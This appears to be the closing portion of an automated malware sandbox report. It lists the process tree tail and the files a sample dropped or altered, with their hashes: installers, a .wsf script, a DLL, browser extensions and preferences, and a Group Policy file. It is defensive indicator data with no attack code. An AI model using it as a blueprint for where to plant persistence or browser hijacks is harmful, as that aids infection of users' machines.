                                                                                                                      \??\C:\Windows\system32\conhost.exe "-1829598672-9174819801173572599-1298833006-19345686111560422770-173545962-1303217234"
                                                                                                                      1⤵
                                                                                                                        PID:1880
                                                                                                                      • C:\Windows\system32\conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe "531054384-4472519063154312363024819408786734-1438074446-1639446401284258247"
                                                                                                                        1⤵
                                                                                                                          PID:2612
                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe "16159057113662932451114735311-199320705113764731351192885558-123473489-914520030"
                                                                                                                          1⤵
                                                                                                                            PID:2736

                                                                                                                          Network

                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                          Replay Monitor

                                                                                                                          Loading Replay Monitor...

                                                                                                                          Downloads

                                                                                                                          • C:\Program Files (x86)\AIpmqDGJEFwqTqMRUxR\EbEXBrU.xml

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            0b1a26a5ca5dbae335b9ec313b11a4e0

                                                                                                                            SHA1

                                                                                                                            5e4102366fae9a2f4270b994429af045339b5f0d

                                                                                                                            SHA256

                                                                                                                            2781b38c2eaf08767bbeb2f7998adad3e846bd6ae759984034f302caf52e9aad

                                                                                                                            SHA512

                                                                                                                            d87d3261228cc36fff72d4f8e594cb916ec8fdbe3b0693a118e7b13db40ffcd74016d7a80110c8ee660ae749661d49b716b6c6646382556d653452e1e95419fe

                                                                                                                          • C:\Program Files (x86)\OmYhQlgyU\EKqdWeJ.xml

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            8ce2dc459ea21710c5e87b2ff307efca

                                                                                                                            SHA1

                                                                                                                            d9128b33539b8a791de4beddd55834acbe231e7e

                                                                                                                            SHA256

                                                                                                                            1b5008c974157eeec170dbd5dbf9ee3617e079be3625e95c6bc14c6cddf24e5f

                                                                                                                            SHA512

                                                                                                                            4def951c3e7e3c0faf67a27c5995d57b37404e44f23f738aa7854e816532537f899a33393b4872b7d2580adc188c7fff22f8e3ca6583b7e1b8801447f9509161

                                                                                                                          • C:\Program Files (x86)\dBdCwOiUpBsdC\mHghyaQ.xml

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            74bb3e54f3b56275b3841198af43b80d

                                                                                                                            SHA1

                                                                                                                            bb52c414b12c514bd7d52cef3f17424015489892

                                                                                                                            SHA256

                                                                                                                            319b35bd8b7970d15d1b149fd2a2265dbc1bd1555d2f518a750a2fa2ee461a6c

                                                                                                                            SHA512

                                                                                                                            eadc85483b66acd8342bcb12d5ce1ee2062e30d00ef215842f3143579d76ea670785e81bd88edb3b90b13c3d453c0f6ddc014a42bee95d90c5dd92973c0e7b0a

                                                                                                                          • C:\Program Files (x86)\rZOpYAGqatpU2\lUFbVOw.xml

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            7aa1ffbe6fb12af7cd0fa3375d40b940

                                                                                                                            SHA1

                                                                                                                            417c561dabae8bb0570c994481d3a2d14c8a530c

                                                                                                                            SHA256

                                                                                                                            27f430b4c1799bc9f892fc158efc578f8f8e491858c506569409e2316b278a79

                                                                                                                            SHA512

                                                                                                                            04bddc36923b3101e47518db2381a46da8385886eb75f1365e2be41b4ef6a189fb5b833f2eb31e28eb1bf20f6a4f42e0da6750f4fe5b15f0ff5c1fb6b9a13a79

                                                                                                                          • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                                            Filesize

                                                                                                                            2.5MB

                                                                                                                            MD5

                                                                                                                            a579854caf2206d56bde53cce1d361bd

                                                                                                                            SHA1

                                                                                                                            f9608be542071a164f3514ee1f6ac2b71e091369

                                                                                                                            SHA256

                                                                                                                            666014d9859c368ec258dcf5591a2ce6d45a6b623836b2f2ea2b960d3e61a018

                                                                                                                            SHA512

                                                                                                                            3ced83bae18a53a0dc011cdcd6127282c1e75b77570a9c58c15329bd92944c9c577e32240dc1770aca6e2c81eda01616c3242cdf44e394b044b7282b701be2f9

                                                                                                                          • C:\ProgramData\eZNCfusnXmtZMmVB\qmhQqLJ.xml

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            b61e804b0314797308a81d123e4e489b

                                                                                                                            SHA1

                                                                                                                            d754cfe6c804b3af6bbe52481ad56f8bedc74581

                                                                                                                            SHA256

                                                                                                                            b187aefb8351f7aedaaa8f8620a0341f9ad3dc5adb67a65c422ee4e0388be328

                                                                                                                            SHA512

                                                                                                                            c26efe73a3f30bf6d4b9215bb7cb326583ad39c881783304e3cff8cf40a7ae7b648eb81e603da542c346b463269f1fe47c737ea6bec877d674e40b8a8102c471

                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                                            Filesize

                                                                                                                            187B

                                                                                                                            MD5

                                                                                                                            2a1e12a4811892d95962998e184399d8

                                                                                                                            SHA1

                                                                                                                            55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                            SHA256

                                                                                                                            32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                            SHA512

                                                                                                                            bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                                            Filesize

                                                                                                                            136B

                                                                                                                            MD5

                                                                                                                            238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                            SHA1

                                                                                                                            0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                            SHA256

                                                                                                                            801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                            SHA512

                                                                                                                            2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                                            Filesize

                                                                                                                            150B

                                                                                                                            MD5

                                                                                                                            0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                            SHA1

                                                                                                                            6a51537cef82143d3d768759b21598542d683904

                                                                                                                            SHA256

                                                                                                                            0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                            SHA512

                                                                                                                            5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                            Filesize

                                                                                                                            10KB

                                                                                                                            MD5

                                                                                                                            f6e8c05a9c2c9ff29eb7e95bd054aa0d

                                                                                                                            SHA1

                                                                                                                            5c6f1a2cf4255ef6b9157ebb275de7fe3ed3946a

                                                                                                                            SHA256

                                                                                                                            599a3d5703ed58a43e93a3f8e4f978132b9bdd237a818fd1df6081734e5e1094

                                                                                                                            SHA512

                                                                                                                            eb677ec95968f89857b18aeccee2fdc5d8eed1c842f1259aeec5732cf8fbb83e21a35864d7149cc0c568c469b8d59eac6d988f01218d43d24a9b68920403c509

                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                            Filesize

                                                                                                                            28KB

                                                                                                                            MD5

                                                                                                                            a141548ac28bfe439bfeab5264319710

                                                                                                                            SHA1

                                                                                                                            52664cc4a3dc7b13008e113cb66bf32b11f634df

                                                                                                                            SHA256

                                                                                                                            c34cd08b23b6f7c10a19cbb1404b11025e81ae2ba6d87d79ed899b16b4ee95cc

                                                                                                                            SHA512

                                                                                                                            b17df8073bc7990a39bdeeb40a698d5ba2a4f7b6ab7949d032fadfd2468132e16f000391865785cc53f2562f9dd8c3770707c960d0ccd947ec224a041cc96e60

                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                            Filesize

                                                                                                                            7KB

                                                                                                                            MD5

                                                                                                                            c158c97f41771b30fc516a28347b249c

                                                                                                                            SHA1

                                                                                                                            66ccd09e5e6e955ce90d9aa9b904124b4e3a9f91

                                                                                                                            SHA256

                                                                                                                            359333fe00e09542773823c9401c4ff3d9306bf93499e199ead42ecb2c436335

                                                                                                                            SHA512

                                                                                                                            64972f108b7c48ec37559381c6a696d2015d80831d3d69e398cd15aa1d84f599123caa18f56c931920d0cb0e15ce3e7bb07dcc071bdc625c5a0e272131090cfd

                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                                                                            Filesize

                                                                                                                            7KB

                                                                                                                            MD5

                                                                                                                            8c66bd48ea624c819cd9383cf68bf2fe

                                                                                                                            SHA1

                                                                                                                            022905d4b78c348dec1791f8196543442df852ec

                                                                                                                            SHA256

                                                                                                                            06c9c35cdb9acd78a7f08630f3c7348d1c8d59cb3b9b0be00a2f199e7baec1fe

                                                                                                                            SHA512

                                                                                                                            28486367a9702ed28b8867418b6298a9adde33e2603e52b023e09a5d49edd9e6b0e3c24b88b4f1255c5150f085df71ac819b54eacb8c12a6af8ece1fcb82cd2b

                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

                                                                                                                            Filesize

                                                                                                                            7KB

                                                                                                                            MD5

                                                                                                                            5967e1fb1f49493eb883daf800ae1d05

                                                                                                                            SHA1

                                                                                                                            5089d795c83b99ec89ab174b1f28f6e4ac95cffb

                                                                                                                            SHA256

                                                                                                                            8469406fb1984d16a8304b377050e57a76fc8ea83f263e63bfbde7f600d73214

                                                                                                                            SHA512

                                                                                                                            c37fa12311add8559629cf430c4d20e420ff1ad0ac9450289f31c48bc2ca7c4da0049aae0386e9bbc5c61b76485e76238af8a308bc6282dd5840d46d46047f73

                                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uj06vnfd.default-release\prefs.js

                                                                                                                            Filesize

                                                                                                                            7KB

                                                                                                                            MD5

                                                                                                                            a86030e754090038ff485fd56098931c

                                                                                                                            SHA1

                                                                                                                            58fb91fbb95a494fdb34c6a58ac11694aee8b97b

                                                                                                                            SHA256

                                                                                                                            1a1b5c4b7ccb500c4ef9e45ff327f7730b4ec1ae9dd26153b70bbc5c7ac354f8

                                                                                                                            SHA512

                                                                                                                            9a79fdca32f941ea23903040bdf6f814cb5a6c23d661913d8f16a2ba774acab1a9e152b47361852d1bc2d52e40ba4585425ef4628511e5d8b15c974e9eeb6093

                                                                                                                          • C:\Windows\Temp\wGQmUIZKEGuxadPB\PcdULMWl\YGxHApANvtCaWYPv.wsf

                                                                                                                            Filesize

                                                                                                                            9KB

                                                                                                                            MD5

                                                                                                                            da1e6b889e7a0465b16e1beb1bb986af

                                                                                                                            SHA1

                                                                                                                            5b9e7e2a77f6773ffb4094a0cf5f0cea94bace33

                                                                                                                            SHA256

                                                                                                                            94b04346e9e32d67ef56d446f7b72f9c3d70f266ecbacaee5be34ac7ce7abbde

                                                                                                                            SHA512

                                                                                                                            491fa80c870c1eed0725404f0ed5e6742503ed1df6964a0a3a3a64b20c09509378545ab795d50a99776ebbdc83d75b5bef85581df7b5c765a63b7b0ff2dbb889

                                                                                                                          • C:\Windows\Temp\wGQmUIZKEGuxadPB\dUjFsKnT\XafmaoT.dll

                                                                                                                            Filesize

                                                                                                                            6.4MB

                                                                                                                            MD5

                                                                                                                            2d4c473cc2ca389edee5cff1f0ed05d0

                                                                                                                            SHA1

                                                                                                                            cf891304e4868c9d621e96438dff6b9300ad5167

                                                                                                                            SHA256

                                                                                                                            76f76da6ec1571a9559645518a08b3114933a58c70eda4fd4dff65dabe2f5e08

                                                                                                                            SHA512

                                                                                                                            85ca1288b7c99066cf44abcf184c7a6acb87ba266f5ed3807c823e35dbeb8e3d0a469180dbc1d0108cfc60ec8565e529647a43ec60c880714b4c73b0975ce41e

                                                                                                                          • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                            Filesize

                                                                                                                            5KB

                                                                                                                            MD5

                                                                                                                            56f153b8c95b82958d4309c3d4d75c01

                                                                                                                            SHA1

                                                                                                                            c5ca575b4af27ee1e2bb8cbc74d01ca5adec19be

                                                                                                                            SHA256

                                                                                                                            31688ad4614779345cb3cd2956e4e0930051497d72213ff9bcd1514d35b2054d

                                                                                                                            SHA512

                                                                                                                            50f190739391571c95bbd846e828fb1a46f3bbff2f312b4576d9d22d76ff43c28892ee4beb167faf97be17bc17d1300b60d9acb77ac4be741cbaa5bb54c42f38

                                                                                                                          • \Users\Admin\AppData\Local\Temp\7zSCF12.tmp\Install.exe

                                                                                                                            Filesize

                                                                                                                            6.4MB

                                                                                                                            MD5

                                                                                                                            47f5ec2e72f9b41ed6186f70d73db727

                                                                                                                            SHA1

                                                                                                                            0bdcc51450852d092de019360e96608246bc4432

                                                                                                                            SHA256

                                                                                                                            c9ef126ccd3f5fe3e1d3ac789b65de67741feb6994d5786410023b3a58bd634a

                                                                                                                            SHA512

                                                                                                                            031ec5e858b84c16a427860435dc667078438e1adeadeb0ce719f69b418577fbf8af8bbe8a281c4dfb3d89c542bf25ce23a4094aec2e565383dbf2f6a6c7700e

                                                                                                                          • \Users\Admin\AppData\Local\Temp\7zSD105.tmp\Install.exe

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                            MD5

                                                                                                                            2798134831906615f341e698d75df451

                                                                                                                            SHA1

                                                                                                                            78acad5747fef6bbf436a06e47e66259b5eab581

                                                                                                                            SHA256

                                                                                                                            e6f73b37ea8a50683f40be08abc30cc907e9b818c09e91a63d36a0d4da90143e

                                                                                                                            SHA512

                                                                                                                            dc238f5fce730c07ce9c80b6457a1caee66ee9d6ed469138ac2910016faf1d01e2545c6743f24056461e14ac6bd489d501ff819e6823fd750a4c31edbe8b2be3

                                                                                                                          • memory/340-54-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            2.9MB

                                                                                                                          • memory/340-55-0x0000000002390000-0x0000000002398000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/1516-66-0x0000000001330000-0x00000000019FD000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1516-44-0x0000000010000000-0x00000000105D1000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.8MB

                                                                                                                          • memory/1516-88-0x0000000001330000-0x00000000019FD000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1516-43-0x0000000001330000-0x00000000019FD000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1620-87-0x0000000000F70000-0x000000000163D000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1620-135-0x0000000002170000-0x00000000021DB000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            428KB

                                                                                                                          • memory/1620-102-0x00000000019E0000-0x0000000001A65000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            532KB

                                                                                                                          • memory/1620-89-0x0000000010000000-0x00000000105D1000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.8MB

                                                                                                                          • memory/1620-332-0x00000000032A0000-0x0000000003377000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            860KB

                                                                                                                          • memory/1620-363-0x0000000000F70000-0x000000000163D000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1620-318-0x0000000002CD0000-0x0000000002D55000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            532KB

                                                                                                                          • memory/1652-65-0x0000000002340000-0x0000000002348000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/1652-64-0x000000001B610000-0x000000001B8F2000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            2.9MB

                                                                                                                          • memory/1784-24-0x0000000001300000-0x00000000019CD000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1784-26-0x0000000001300000-0x00000000019CD000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1784-25-0x0000000001300000-0x00000000019CD000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1784-23-0x00000000001A0000-0x000000000086D000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/1784-29-0x0000000010000000-0x00000000105D1000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.8MB

                                                                                                                          • memory/1784-42-0x00000000001A0000-0x000000000086D000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/2188-22-0x00000000023A0000-0x0000000002A6D000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            6.8MB

                                                                                                                          • memory/2592-71-0x0000000077A10000-0x0000000077B0A000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            1000KB

                                                                                                                          • memory/2592-70-0x0000000077B10000-0x0000000077C2F000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            1.1MB

                                                                                                                          • memory/2712-351-0x00000000014D0000-0x0000000001AA1000-memory.dmp

                                                                                                                            Filesize

                                                                                                                            5.8MB